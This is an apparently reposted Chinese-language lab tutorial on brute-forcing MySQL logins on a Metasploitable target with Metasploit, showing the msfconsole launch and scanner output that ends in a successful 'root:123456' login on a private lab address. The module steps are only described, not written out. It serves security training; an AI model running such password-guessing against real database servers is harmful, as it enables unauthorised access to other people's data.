zoukankan      html  css  js  c++  java
  • 安全测试17渗透攻击Mysql数据库服务

    在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。

    启动MSFCONSOLE。

    root@kali:~#msfconsole

     扫描所有有效的Mysql模块。

     输出信息显示Mysql可用模块,在模块中,选择渗透工具模块进行攻击

    这里使用Mysql扫描模块

     显示模块的有效选项

     为攻击目标指定目标系统IP,用户文件,密码文件

     启用渗透攻击

    [+] 192.168.52.1:3306     - 192.168.52.1:3306 - Found remote MySQL version 5.5.53
    [!] 192.168.52.1:3306     - No active DB -- Credential data will not be saved!
    [-] 192.168.52.1:3306     - 192.168.52.1:3306 - LOGIN FAILED: root:%null% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
    [-] 192.168.52.1:3306     - 192.168.52.1:3306 - LOGIN FAILED: root:%username% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
    [-] 192.168.52.1:3306     - 192.168.52.1:3306 - LOGIN FAILED: root:!@#$ (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
    [-] 192.168.52.1:3306     - 192.168.52.1:3306 - LOGIN FAILED: root:!@#$% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
    [+] 192.168.52.1:3306     - 192.168.52.1:3306 - Success: 'root:123456'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    输出信息是渗透攻击的一个过程,尝试使用指定的用户名和密码文件中的用户名和密码连接mysql服务器,从输出信息中可以看出,已经测试出Mysql数据库服务器的用户名和密码为root和123456

    更多技术请关注微信公众号:程序员技术前沿
  • 相关阅读:
    记事本:js简介
    python 类的魔法函数 内置函数 类方法 静态方法 抽象类
    python 类
    python 列表 元组 字典 集合
    python:函数和循环判断
    记事本:盒模型
    第5章学习小结
    倍增法求LCA(最近公共最先)
    L
    第4章学习小结
  • 原文地址:https://www.cnblogs.com/tiechui2015/p/15683163.html
Copyright © 2011-2022 走看看